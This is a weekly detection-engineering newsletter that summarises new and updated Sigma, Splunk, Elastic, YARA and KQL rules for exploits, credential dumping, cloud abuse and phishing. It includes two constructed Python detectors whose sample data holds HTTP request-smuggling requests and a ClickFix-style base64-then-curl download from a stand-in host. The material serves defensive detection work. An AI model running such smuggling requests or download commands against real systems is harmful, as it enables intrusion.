Detections Digest #20251027
The issue highlights key updates from 8 repos, including 49 new and 59 modified Sublime Security, Elastic, Sigma, YARA, KQL, and Splunk detection rules.
This week’s update highlights the most significant changes to detection rules from 8 of the 50+ monitored GitHub repositories. Between Oct 20 and Oct 27, 2025, contributors added 49 new rules and updated 59 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
- New detections cover multiple recent exploits. Sigma added rules for a Commvault RCE chain and GoAnywhere MFT attacks. Splunk’s content now detects Oracle E-Business Suite exploitation, while new YARA rules detect exploitation of the WSUS RCE and WinRAR path traversal vulnerabilities. (SigmaHQ/sigma, splunk/security_content, Neo23x0/signature-base, bartblaze/Yara-rules)
- Cloud detection coverage is expanded for AWS and Azure. New Sigma rules use CloudTrail data to find defense evasion and persistence on AWS. Concurrently, new KQL queries detect lateral movement from compromised Entra ID accounts to Azure VMs and correlate risky sign-ins with phishing clicks. (SigmaHQ/sigma, HybridBrothers/Hunting-Queries-Detection-Rules, benscha/KQLAdvancedHunting)
- Credential dumping rules were refined across multiple repositories. Detections for ProcDump abuse in both Sigma and Splunk were updated to include more command-line flags. They also now monitor for memory dumps of the ‘keyiso’ and ‘samss’ processes in addition to ‘lsass’. (SigmaHQ/sigma, splunk/security_content)
- New analytics target web application attacks and email-based threats. Splunk added rules for HTTP request smuggling and anomalous user agents. Sublime Security improved detection of brand impersonation for Discord and Adobe, while also tuning logic for DocuSign and sextortion emails. (splunk/security_content, sublime-security/sublime-rules)
- Linux and macOS detection logic has been improved. New rules identify post-exploitation techniques like on-host compilation in ‘/dev/shm’ on Linux and the ClickFix attack pattern on macOS. Existing rules for reverse shells and persistence were tuned with new exceptions for common software to lower false positives. (elastic/protections-artifacts, SigmaHQ/sigma, benscha/KQLAdvancedHunting)
🚀 Make updates from this digest operational → All detection rules from this digest are available in our MISP and STIX/TAXII feeds ready for direct integration into your SIEM, TIP, or SOAR solution, boosting your automated threat detection and enriching your existing intel.
Table Of Contents
- SigmaHQ/sigma (+19, ✎9)
- sublime-security/sublime-rules (+2, ✎4)
- splunk/security_content (+16, ✎11)
- elastic/protections-artifacts (+7, ✎34)
Corporate repositories (4)
SigmaHQ/sigma (+19, ✎9)
+ New rules
New rules detect multiple exploitation stages for Commvault vulnerabilities. This includes argument injection for auth bypass (CVE-2025-57791), credential abuse attempts (CVE-2025-57788), and post-authentication webshell drops using qoperation.exe (CVE-2025-57790). (Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791), Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788), Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790))
AWS monitoring capabilities are expanded with new rules that use CloudTrail data. Detections now cover brute-force attempts, S3 bucket and VPC Flow Log deletion for defense evasion, console logins from unusual locations, persistence via enabling new regions, and credential validation using the TruffleHog tool. (AWS ConsoleLogin Failed Authentication, AWS Bucket Deleted, AWS Console Login Monitoring, AWS VPC Flow Logs Deleted, AWS EnableRegion Command Monitoring, AWS STS GetCallerIdentity Enumeration Via TruffleHog)
Two new rules target post-compromise activity on web-facing applications. One detects suspicious file writes to Apache or Tomcat web roots, indicative of webshell deployment. The other identifies anomalous child process execution from GoAnywhere MFT, a behavior linked to exploitation of CVE-2025-10035. (Suspicious File Write to Webapps Root Directory, Potential Exploitation of GoAnywhere MFT Vulnerability)
Coverage for adversary TTPs on Windows is improved. New rules detect the installation and use of Kali Linux via WSL, misuse of the Restic backup tool for data exfiltration, and the deletion of the RunMRU registry key to hide command execution history. (RunMRU Registry Key Deletion - Registry, RunMRU Registry Key Deletion, Installation of WSL Kali-Linux, WSL Kali-Linux Usage, PUA - Restic Backup Tool Execution)
New detections identify adversary activity through system and network configuration changes. These include lateral movement attempts via unsecured SMB shares on Windows, potential mitm6 attacks using ISATAP router configuration, and a Linux persistence technique that disables system power management via systemctl mask. (Mask System Power Settings Via Systemctl, ISATAP Router Address Was Set, Unsigned or Unencrypted SMB Connection to Share Established)
✎ Modified rules
Detection of file downloads via PowerShell is updated across three rules. Two rules targeting web requests from command line and scriptblock logs were refined by removing the ‘Net.WebClient’ condition to reduce noise. A third rule was broadened to detect download commands executed from the PowerShell ISE process. (Usage Of Web Request Commands And Cmdlets - ScriptBlock, PowerShell Download Pattern, Usage Of Web Request Commands And Cmdlets)
Two rules targeting credential dumping were improved. Detection of LSASS memory dumps via ProcDump now includes more command-line flags and targets additional security processes like ‘keyiso’ and ‘samss’. Detection for the Windows Credential Editor tool was updated to use specific image names and a wider set of import hashes. (Potential LSASS Process Dump Via Procdump, HackTool - Windows Credential Editor (WCE) Execution)
System reconnaissance detection is improved through two rule updates. One rule broadens coverage for WMI-based disk and volume discovery using wmic.exe. The other adds OriginalFileName checks for common user discovery utilities like whoami.exe and quser.exe to make detection more robust. (System Disk And Volume Reconnaissance Via Wmic.EXE, Local Accounts Discovery)
A rule for detecting persistence via Windows startup folders was updated. The list of monitored file extensions was significantly expanded to include ‘.cmd’, ‘.dll’, ‘.js’, and ‘.wsf’, among others, providing wider coverage for this common technique. (Suspicious Startup Folder Persistence)
A rule detecting defense evasion through the use of Windows 8.3 short name paths was updated. The logic was refactored with more specific filter groups for system processes and installers, improving the clarity and precision of exclusions. (Use Short Name Path in Image)
sublime-security/sublime-rules (+2, ✎4)
+ New rules
New rules detect phishing attacks that impersonate notifications from Adobe Creative Cloud and Discord. The Adobe rule identifies messages from newly observed email addresses. The Discord rule uses multiple checks including sender display name, domain analysis, logo detection, and DMARC failure to spot fraudulent notifications. (Service abuse: Adobe Creative Cloud share from an unsolicited sender address, Brand impersonation: Discord notification)
✎ Modified rules
Detection for various email-based phishing and impersonation tactics was refined. Updates improve identification of spoofed calendar invites by correctly handling DMARC authentication results. DocuSign phishing detection in PDFs is broadened through more flexible analysis of file components. False positives in Booking.com brand impersonation detection are reduced by excluding Microsoft quarantine notifications. (Attachment: ICS calendar with embedded file from internal sender with SPF failure, Brand impersonation: DocuSign PDF attachment with suspicious link, Brand impersonation: Booking.com)
Detection coverage for extortion and sextortion emails is expanded. The rule now incorporates an additional Natural Language Understanding topic, ‘Financial Communications’, and includes an updated regex to identify obfuscated cryptocurrency terms. (Extortion / sextortion (untrusted sender))
splunk/security_content (+16, ✎11)
+ New rules
New rules detect various web attack techniques. The primary focus is on HTTP request smuggling, identifying duplicated headers, conflicting Content-Length and Transfer-Encoding headers, and an IIS-specific variant using reserved device names. Other rules find rapid POST request floods and reconnaissance activity using non-browser user agents. (HTTP Rapid POST with Mixed Status Codes, HTTP Duplicated Header, HTTP Possible Request Smuggling, HTTP Request to Reserved Name on IIS Server, HTTP Suspicious Tool User Agent)
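The three request smuggling signals listed above can be checked directly against raw request headers. The following is an added example, not Splunk's own search logic; the sample requests, the reserved-name list and the indicator names are constructed for illustration.

```python
"""Constructed example: flag HTTP request smuggling indicators in a raw
request: duplicated headers, conflicting Content-Length / Transfer-Encoding,
and a reserved Windows device name used as a path segment on IIS."""
from collections import Counter

# Reserved Windows device names; IIS handles these path segments specially
RESERVED_NAMES = {"con", "prn", "aux", "nul"} | {f"com{i}" for i in range(1, 10)} | {f"lpt{i}" for i in range(1, 10)}


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, [(name, value), ...])."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, path, headers


def smuggling_indicators(raw: str) -> list:
    """Return the indicator names found in one request (empty list if clean)."""
    _method, path, headers = parse_request(raw)
    names = [n for n, _ in headers]
    findings = []
    # 1. The same header name appearing twice (e.g. two Content-Length values)
    for name, count in Counter(names).items():
        if count > 1:
            findings.append(f"duplicated_header:{name}")
    # 2. Content-Length and Transfer-Encoding together: front end and back end
    #    may disagree on where the body ends (CL.TE / TE.CL ambiguity)
    if "content-length" in names and "transfer-encoding" in names:
        findings.append("cl_te_conflict")
    # 3. A reserved device name as a path segment, ignoring extension and query
    segments = [s.split(".")[0].lower() for s in path.split("?")[0].split("/") if s]
    if any(s in RESERVED_NAMES for s in segments):
        findings.append("iis_reserved_name")
    return findings


# Constructed sample requests, one per signal plus a benign control
SAMPLES = {
    "benign": "GET /index.html HTTP/1.1\r\nHost: app\r\n\r\n",
    "dup_cl": "POST /api HTTP/1.1\r\nHost: app\r\nContent-Length: 5\r\nContent-Length: 6\r\n\r\nhello",
    "cl_te": "POST /api HTTP/1.1\r\nHost: app\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "iis_con": "GET /scripts/con.aspx?x=1 HTTP/1.1\r\nHost: iis\r\n\r\n",
}


def scan_samples(samples=SAMPLES) -> dict:
    """Run the checks over every sample and return {label: [indicators]}."""
    return {label: smuggling_indicators(raw) for label, raw in samples.items()}
```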
Two rules were added to detect exploitation of Oracle E-Business Suite vulnerabilities CVE-2025-61882 and CVE-2025-61884. Detections monitor Cisco Secure Firewall logs for specific intrusion signature IDs. One rule correlates multiple related signatures from the same source and destination to identify a multi-stage attack. (Cisco Secure Firewall - Oracle E-Business Suite Exploitation, Cisco Secure Firewall - Oracle E-Business Suite Correlation)
New detections target the use of common adversary tools on Windows endpoints. The rules identify the execution of network scanners like Advanced IP Scanner and reconnaissance utilities from the PsTools suite. Another rule detects the creation of NirSoft tool ZIP archives, often used to stage credential harvesting utilities. (Advanced IP or Port Scanner Execution, Windows NirSoft Tool Bundle File Created, Windows PsTools Recon Usage)
Two new analytics target PowerShell-based defense evasion techniques. One rule detects attempts to weaken Windows Defender by disabling Attack Surface Reduction rules with Set-MpPreference. The other identifies manual Base64 decoding routines in command lines, used to bypass standard encoded command detection. (Windows Defender ASR or Threat Configuration Tamper, Windows PowerShell Process Implementing Manual Base64 Decoder)
New coverage was added for malicious execution techniques that abuse legitimate system functions. Detections identify WMI spawning LOLBAS binaries, processes launched from the RDP-mapped share path (\\tsclient\), use of wbadmin.exe to restore files, and remote code execution by piping downloaded content directly to a shell. (Wmiprvse LOLBAS Execution Process Spawn, File Download or Read to Pipe Execution, Windows Process Execution From RDP Share, Windows WBAdmin File Recovery From Backup)
✎ Modified rules
Detection for LOLBAS binaries making outbound network connections was improved across multiple rules. The updates for regasm.exe, Regsvcs.exe, and a general list of LOLBAS executables now use a more comprehensive set of private and reserved IP address ranges for exclusion. This change reduces false positives from legitimate internal network traffic. (Detect Regasm with Network Connection, Detect Regsvcs with Network Connection, LOLBAS With Network Traffic)
Coverage for reconnaissance techniques was expanded. Detection for Active Directory enumeration via AdFind.exe was broadened to include more command-line arguments. The rule for event log discovery was updated to check both the process name and original filename of tools like wevtutil.exe, countering simple evasion by renaming. (Windows EventLog Recon Activity Using Log Query Utilities, Windows AdFind Exe)
Rules targeting defense evasion and credential access were updated. Detection for Windows Defender tampering now covers additional Set-MpPreference parameters and specific values that disable security features. The procdump.exe rule was expanded to find more command-line flags and monitor for dumping of keyiso and samss processes in addition to lsass. (Dump LSASS via procdump, Powershell Disable Security Monitoring)
Two rules that detect anomalous network activity from non-standard file paths were refined. Detections for SMTP and FTP connections now use more specific, fully-qualified paths for process image exclusions. This narrows the filter criteria for legitimate application directories and improves detection accuracy. (Windows Mail Protocol In Non-Common Process Path, Windows File Transfer Protocol In Non-Common Process Path)
Post-exploitation detections were broadened. The rule for SSH abuse now identifies LocalCommand in addition to ProxyCommand and checks for more child processes like pwsh.exe and wmic.exe. The rule for privilege escalation was updated to more reliably identify when a newly created account is added to the local administrators group. (Detect New Local Admin account, Windows SSH Proxy Command)
elastic/protections-artifacts (+7, ✎34)
+ New rules
New detections for Windows post-exploitation focus on defense evasion and credential access. These rules identify unsigned processes reading credential stores, the use of ClipUp.exe to overwrite protected files, and anomalous child processes of the Trend Micro Security Agent. (Sensitive File Access by an Unsigned Process, Potential Evasion via ClipUp Execution, Suspicious Trend Micro Security Agent Child Process)
Two new rules address reconnaissance and command and control. One detects suspicious LDAP search queries for domain user enumeration. The other identifies the VS Code ‘tunnel’ command, which can be misused for C2 or data exfiltration. (Attempt to establish VScode Remote Tunnel, Domain Accounts Enumeration via LDAP Search)
New rules improve coverage for Linux and macOS. One rule detects on-host compilation in /dev/shm on Linux, a ‘Compile After Delivery’ technique. Another identifies script creation on macOS immediately following network connections to suspicious TLDs. (Linux Compilation in Suspicious Directory, File Download from Suspicious Top Level Domain)
✎ Modified rules
Multiple Linux rules for detecting reverse shells, web server attacks, and system utility abuse were tuned to reduce false positives. The updates add exclusions for legitimate activity from development tools, container runtimes, Ansible automation, and the CUPS printing system (related to CVE-2024-47176). Some rules also gained new process termination actions. (Potential Reverse Shell Activity via Terminal, Chattr Execution from Unusual Parent, Linux Suspicious Child Process Execution via Interactive Shell, Printer User (lp) Shell Execution, Netcat Reverse Shell via Busybox, Suspicious Mining Process Events, Suspicious Execution via a Hidden Process, Decode Activity via Web Server, Suspicious Download and Redirect by Web Server, Potential Web Server Directory Traversal)
Several Windows rules targeting credential access and privilege escalation were tuned. Updates add exceptions for security agents like Tanium and Sophos, Windows migration tools, and legitimate system setup executables. This improves the accuracy of detections for LSASS access, credential manager theft, and privilege escalation via token impersonation. (LSASS Access Attempt from Unbacked Memory, Potential Browser Credentials Stealer, Potential Discovery of Windows Credential Manager Store, Potential Privilege Escalation via Token Impersonation, Suspicious Impersonation as Trusted Installer, Privilege Escalation via EXTENDED STARTUPINFO, Potential Execution via Token Theft)
A broad set of Windows rules for defense evasion and execution were refined to lower false positives. Updates add exclusions for administrative tools and legitimate applications across detections for LOLBIN abuse (curl, PowerShell, rundll32), process injection, kernel driver exploits (including CVE-2024-21338), and Office template persistence. Some rule logic was also simplified. (Ingress Tool Transfer via CURL, Potential CVE-2024-21338 Exploitation, Potential Masquerading as SVCHOST, Potential Evasion with Hardware Breakpoints, Potential Evasion via Invalid Code Signature, Process Explorer Device Access by Unusual Process, Unusual Network Connection via RunDLL32, Windows Console Execution from Unbacked Memory, Suspicious API Call from a PowerShell Script, Suspicious Command Shell Execution via Windows Run, Suspicious Windows Script Interpreter Child Process, Office Application Startup via Template File Modification, Suspicious Windows Schedule Child Process)
Four macOS rules were updated to reduce false positives from common software. Exclusions were added for legitimate system management tools like jamf and NinjaRMM, Python development environments, and software such as Cisco Secure Client. The updates improve the accuracy of detections for persistence via Launch Agents and execution from mounted devices. (Suspicious Task for Pid System Call, Suspicious Script or Process Execution from Mounted Device, Terminal closed with Pkill or Killall, Persistence via Suspicious Launch Agent or Launch Daemon)
Personal repositories (4)
HybridBrothers/Hunting-Queries-Detection-Rules (✎1)
✎ Modified rules
A new KQL rule detects lateral movement from a compromised Entra ID account to Azure or Azure Arc virtual machines. The detection triggers when a user with pre-existing risk events in Entra ID Identity Protection deploys custom scripts or run commands, indicating a possible cloud control plane compromise. (Detect Custom Script or Run Command deployment by risky user)
benscha/KQLAdvancedHunting (+3)
+ New rules
New rules target phishing and impersonation. One rule detects a single Gmail sender using multiple display names, indicating impersonation attempts. Another identifies risky Azure AD sign-ins from outside defined IP ranges that occur shortly after a user clicks a URL, suggesting a phishing-initiated account compromise. (Risky SignIn after EmailUrlClickEvent, Gmail Sender with Multiple Display Names)
A new KQL rule detects the macOS ClickFix attack pattern. It identifies a base64 command executed by a shell, followed within seconds by a curl command downloading content, to spot attempts to run malicious payloads. (macOS ClickFix Attack with Base64 encrypted curl Command)
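The sequence this rule looks for, a shell-spawned base64 decode followed within seconds by a curl download on the same host, can be expressed as a small temporal correlation over process events. This is an added example, not the repository's KQL; the event format, the 10-second window and the sample events are assumptions constructed for illustration.

```python
"""Constructed example: correlate a shell-launched `base64` decode with a
`curl` download that follows within a short window on the same host."""
from datetime import datetime, timedelta

SHELLS = {"bash", "zsh", "sh"}
WINDOW = timedelta(seconds=10)  # assumed correlation window

# Constructed process-creation events: (time, host, parent, process, command line)
EVENTS = [
    ("2025-10-24T10:01:02", "mac-01", "Terminal", "zsh", "zsh -c 'echo aGVsbG8= | base64 --decode'"),
    ("2025-10-24T10:01:02", "mac-01", "zsh", "base64", "base64 --decode"),
    ("2025-10-24T10:01:05", "mac-01", "zsh", "curl", "curl -fsSL http://example.invalid/x -o /tmp/x"),
    # Unrelated decode and download 15 minutes apart: must not correlate
    ("2025-10-24T11:30:00", "mac-02", "zsh", "base64", "base64 -d"),
    ("2025-10-24T11:45:00", "mac-02", "zsh", "curl", "curl https://example.invalid/pkg"),
]


def is_base64_decode(parent: str, proc: str, cmd: str) -> bool:
    """base64 started by an interactive shell in decode mode (-d, -D or --decode)."""
    return parent in SHELLS and proc == "base64" and any(f in cmd for f in ("--decode", " -d", " -D"))


def is_curl_download(proc: str, cmd: str) -> bool:
    """curl invoked with a URL on its command line."""
    return proc == "curl" and "://" in cmd


def clickfix_matches(events=EVENTS, window=WINDOW) -> list:
    """Return (host, decode_time, curl_time) for each decode followed by a
    curl download within `window` on the same host."""
    parsed = sorted(
        ((datetime.fromisoformat(t), h, p, n, c) for t, h, p, n, c in events),
        key=lambda e: e[0],
    )
    matches = []
    for i, (t1, host, parent, proc, cmd) in enumerate(parsed):
        if not is_base64_decode(parent, proc, cmd):
            continue
        # Scan forward only while still inside the window
        for t2, h2, _p2, n2, c2 in parsed[i + 1:]:
            if t2 - t1 > window:
                break
            if h2 == host and is_curl_download(n2, c2):
                matches.append((host, t1.isoformat(), t2.isoformat()))
                break
    return matches
```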
Neo23x0/signature-base (+1)
+ New rules
A new YARA rule detects exploitation of the WSUS remote code execution vulnerability CVE-2025-59287. Detection logic targets specific error traceback strings in WSUS logs and base64-encoded PowerShell commands used for discovery. (EXPL_WSUS_Exploitation_Indicators_Oct25)
bartblaze/Yara-rules (+1)
+ New rules
A new YARA rule detects RAR archives exploiting the WinRAR path traversal vulnerability (CVE-2023-38831). The rule identifies a specific Alternate Data Stream path traversal string used to place malicious script or executable files in arbitrary locations upon extraction. (WinRAR_ADS_Traversal)
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we’d love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by an LLM based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We’d be happy to help — contact us.